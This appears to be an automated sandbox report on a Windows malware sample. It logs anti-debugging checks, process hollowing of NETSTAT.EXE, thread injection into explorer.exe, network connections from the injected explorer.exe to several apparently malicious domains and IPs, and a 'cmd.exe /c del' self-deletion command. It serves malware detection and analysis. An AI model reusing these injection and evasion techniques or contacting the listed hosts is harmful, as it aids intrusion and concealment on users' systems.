            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8927A mov eax, dword ptr fs:[00000030h]18_2_02D8927A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5766D mov eax, dword ptr fs:[00000030h]18_2_02D5766D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFB260 mov eax, dword ptr fs:[00000030h]18_2_02DFB260
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFB260 mov eax, dword ptr fs:[00000030h]18_2_02DFB260
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D63A1C mov eax, dword ptr fs:[00000030h]18_2_02D63A1C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A61C mov eax, dword ptr fs:[00000030h]18_2_02D7A61C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A61C mov eax, dword ptr fs:[00000030h]18_2_02D7A61C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4C600 mov eax, dword ptr fs:[00000030h]18_2_02D4C600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4C600 mov eax, dword ptr fs:[00000030h]18_2_02D4C600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4C600 mov eax, dword ptr fs:[00000030h]18_2_02D4C600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D78E00 mov eax, dword ptr fs:[00000030h]18_2_02D78E00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D58A0A mov eax, dword ptr fs:[00000030h]18_2_02D58A0A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFFE3F mov eax, dword ptr fs:[00000030h]18_2_02DFFE3F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4E620 mov eax, dword ptr fs:[00000030h]18_2_02D4E620
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D837F5 mov eax, dword ptr fs:[00000030h]18_2_02D837F5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D58794 mov eax, dword ptr fs:[00000030h]18_2_02D58794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E15BA5 mov eax, dword ptr fs:[00000030h]18_2_02E15BA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7B390 mov eax, dword ptr fs:[00000030h]18_2_02D7B390
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC7794 mov eax, dword ptr fs:[00000030h]18_2_02DC7794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC7794 mov eax, dword ptr fs:[00000030h]18_2_02DC7794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC7794 mov eax, dword ptr fs:[00000030h]18_2_02DC7794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D51B8F mov eax, dword ptr fs:[00000030h]18_2_02D51B8F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D51B8F mov eax, dword ptr fs:[00000030h]18_2_02D51B8F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFD380 mov ecx, dword ptr fs:[00000030h]18_2_02DFD380
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E0138A mov eax, dword ptr fs:[00000030h]18_2_02E0138A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18F6A mov eax, dword ptr fs:[00000030h]18_2_02E18F6A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4F358 mov eax, dword ptr fs:[00000030h]18_2_02D4F358
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4DB40 mov eax, dword ptr fs:[00000030h]18_2_02D4DB40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5EF40 mov eax, dword ptr fs:[00000030h]18_2_02D5EF40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D73B7A mov eax, dword ptr fs:[00000030h]18_2_02D73B7A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D73B7A mov eax, dword ptr fs:[00000030h]18_2_02D73B7A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4DB60 mov ecx, dword ptr fs:[00000030h]18_2_02D4DB60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5FF60 mov eax, dword ptr fs:[00000030h]18_2_02D5FF60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18B58 mov eax, dword ptr fs:[00000030h]18_2_02E18B58
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6F716 mov eax, dword ptr fs:[00000030h]18_2_02D6F716
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDFF10 mov eax, dword ptr fs:[00000030h]18_2_02DDFF10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDFF10 mov eax, dword ptr fs:[00000030h]18_2_02DDFF10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A70E mov eax, dword ptr fs:[00000030h]18_2_02D7A70E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A70E mov eax, dword ptr fs:[00000030h]18_2_02D7A70E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7E730 mov eax, dword ptr fs:[00000030h]18_2_02D7E730
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E1070D mov eax, dword ptr fs:[00000030h]18_2_02E1070D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E1070D mov eax, dword ptr fs:[00000030h]18_2_02E1070D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D44F2E mov eax, dword ptr fs:[00000030h]18_2_02D44F2E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D44F2E mov eax, dword ptr fs:[00000030h]18_2_02D44F2E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E0131B mov eax, dword ptr fs:[00000030h]18_2_02E0131B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov ecx, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E014FB mov eax, dword ptr fs:[00000030h]18_2_02E014FB
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6CF0 mov eax, dword ptr fs:[00000030h]18_2_02DC6CF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6CF0 mov eax, dword ptr fs:[00000030h]18_2_02DC6CF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6CF0 mov eax, dword ptr fs:[00000030h]18_2_02DC6CF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18CD6 mov eax, dword ptr fs:[00000030h]18_2_02E18CD6
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D49080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D890AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D60050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D60050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DDC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DDC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E02073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E11074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D6746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E1740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E1740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E1740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E14015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E14015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DF8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D4B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D4B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D4B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DD41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D5D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D6C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D71DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D71DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D71DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D735A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D67D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D6B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D6B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D83D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DC3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D6C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D6C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D4B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D4B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D4C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D49100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D49100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D49100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02E18D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D4AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02DCA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D74D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D74D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D74D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D7513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D64120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D64120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D64120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D64120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D64120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00409B30 LdrLoadDll
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: www.instatechnovelz.com
            Source: C:\Windows\explorer.exe | Network Connect: 172.65.227.72 80
            Source: C:\Windows\explorer.exe | Domain query: www.apricitee.com
            Source: C:\Windows\explorer.exe | Domain query: www.shacksolid.com
            Source: C:\Windows\explorer.exe | Network Connect: 64.190.62.111 80
            Source: C:\Windows\explorer.exe | Domain query: www.brondairy.com
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: B70000
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Thread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Thread register set: target process: 3472
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Thread register set: target process: 3472
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3472
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Process created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Process created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
            Source: explorer.exe, 00000007.00000000.277343079.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Users\user\Desktop\Fu94e0b1TR.exe VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
